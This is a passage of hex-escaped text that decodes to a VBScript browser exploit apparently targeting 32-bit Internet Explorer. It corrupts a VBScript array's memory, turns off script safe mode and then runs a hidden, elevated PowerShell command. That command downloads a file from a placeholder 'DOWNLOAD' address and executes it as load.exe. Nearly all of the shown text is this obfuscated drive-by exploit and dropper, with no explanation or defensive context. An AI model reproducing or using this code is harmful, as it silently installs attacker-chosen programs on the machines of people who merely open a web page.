\x74\\x0D\\x0A\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6C\\x6C\\x3D\\x63\\x72\\x65\\x61\\x74\\x65\\x6F\\x62\\x6A\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x22\\x29\\x0D\\x0A\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x3D\\x22\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x2D\\x45\\x78\\x70\\x72\\x65\\x73\\x73\\x69\\x6F\\x6E\\x20\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x53\\x79\\x73\\x74\\x65\\x6D\\x2E\\x4E\\x65\\x74\\x2E\\x57\\x65\\x62\\x43\\x6C\\x69\\x65\\x6E\\x74\\x29\\x2E\\x44\\x6F\\x77\\x6E\\x6C\\x6F\\x61\\x64\\x46\\x69\\x6C\\x65\\x28\\x27\\x44\\x4F\\x57\\x4E\\x4C\\x4F\\x41\\x44\\x27\\x2C\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x2D\\x63\\x6F\\x6D\\x20\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x29\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x22\\x0D\\x0A\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x
22\\x70\\x6F\\x77\\x65\\x72\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x65\\x78\\x65\\x22\\x2C\\x20\\x22\\x2D\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x2C\\x20\\x22\\x22\\x2C\\x20\\x22\\x72\\x75\\x6E\\x61\\x73\\x22\\x2C\\x20\\x30\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x30\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x31\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x32\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x33\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x72\\x6E\\x64\\x61\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x6C\\x61\\x73\\x73\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x0D\\x0A\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x69\\x6E\\x66\\x6F\\x3D\\x4E\\x61\\x76\\x69\\x67\\x61\\x74\\x6F\\x72\\x2E\\x55\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x57\\x69\\x6E\\x36\\x34\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x
6E\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\\x43\\x49\\x6E\\x74\\x28\\x4D\\x69\\x64\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x49\\x6E\\x53\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x20\\x2B\\x20\\x35\\x2C\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x30\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x49\\x66\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x32\\x31\\x37\\x36\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x33\\x32\\x37\\x36\\x37\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x29\\x0D\\x0A\\x20\\x0D\\x
0A\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x22\\x3C\\x62\\x72\\x3E\\x20\\x49\\x45\\x22\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x65\\x28\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x52\\x61\\x6E\\x64\\x6F\\x6D\\x69\\x7A\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x61\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x62\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x30\\x3D\\x31\\x33\\x2B\\x31\\x37\\x2A\\x72\\x6E\\x64\\x28\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x33\\x3D\\x37\\x2B\\x33\\x2A\\x72\\x6E\\x64\\x28\\x35\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x64\\x69\\x
6D\\x20\\x69\\x0D\\x0A\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x46\\x6F\\x72\\x20\\x69\\x20\\x3D\\x20\\x30\\x20\\x54\\x6F\\x20\\x34\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x46\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x0D\\x0A\\x20\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x73\\x75\\x62\\x20\\x74\\x65\\x73\\x74\\x61\\x61\\x28\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x73\\x75\\x62\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x74\\x65\\x73\\x74\\x61\\x61\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x6E\\x75\\x6C\\x6C\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x69\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x36\\x2E\\x33\\x36\\x35\\x39\\x38\\x37\\x33\\x37\\x34\\x33\\x37\\x38\\x30\\x31\\x45\\x2D\\x33\\x31\\x34\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x37\\x34\\x30\\x38\\x38\\x35\\x33\\x34\\x37\\x33\\x31\\x33\\x32\\x34\\x45\\x2D\\x33\\x31\\x30\\x20\\x20\\x0D\\x
0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x3D\\x61\\x61\\x28\\x61\\x31\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x38\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x31\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x33\\x34\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x66\\x6F\\x72\\x20\\x6B\\x3D\\x30\\x20\\x74\\x6F\\x20\\x26\\x68\\x36\\x30\\x20\\x73\\x74\\x65\\x70\\x20\\x34\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x6A\\x3D\\x31\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x28\\x69\\x2B\\x26\\x68\\x31\\x31\\x63\\x2B\\x6B\\x29\\x3D\\x61\\x62\\x28\\x34\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x
20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x66\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6E\\x65\\x78\\x74\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x64\\x69\\x6D\\x20\\x74\\x79\\x70\\x65\\x31\\x2C\\x74\\x79\\x70\\x65\\x32\\x2C\\x74\\x79\\x70\\x65\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x30\\x3D\\x61\\x30\\x2B\\x61\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x31\\x3D\\x61\\x30\\x2B\\x32\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x32\\x3D\\x61\\x30\\x2B\\x26\\x68\\x38\\x30\\x30\\x30\\x30\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x61\\x30\\x29\\x
20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x3D\\x31\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6D\\x65\\x6D\\x3D\\x63\\x69\\x6E\\x74\\x28\\x61\\x30\\x2B\\x31\\x29\\x2A\\x31\\x36\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x28\\x6A\\x3D\\x6D\\x65\\x6D\\x2B\\x34\\x29\\x20\\x6F\\x72\\x20\\x28\\x6A\\x2A\\x38\\x3D\\x6D\\x65\\x6D\\x2B\\x38\\x29\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x
28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x
20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31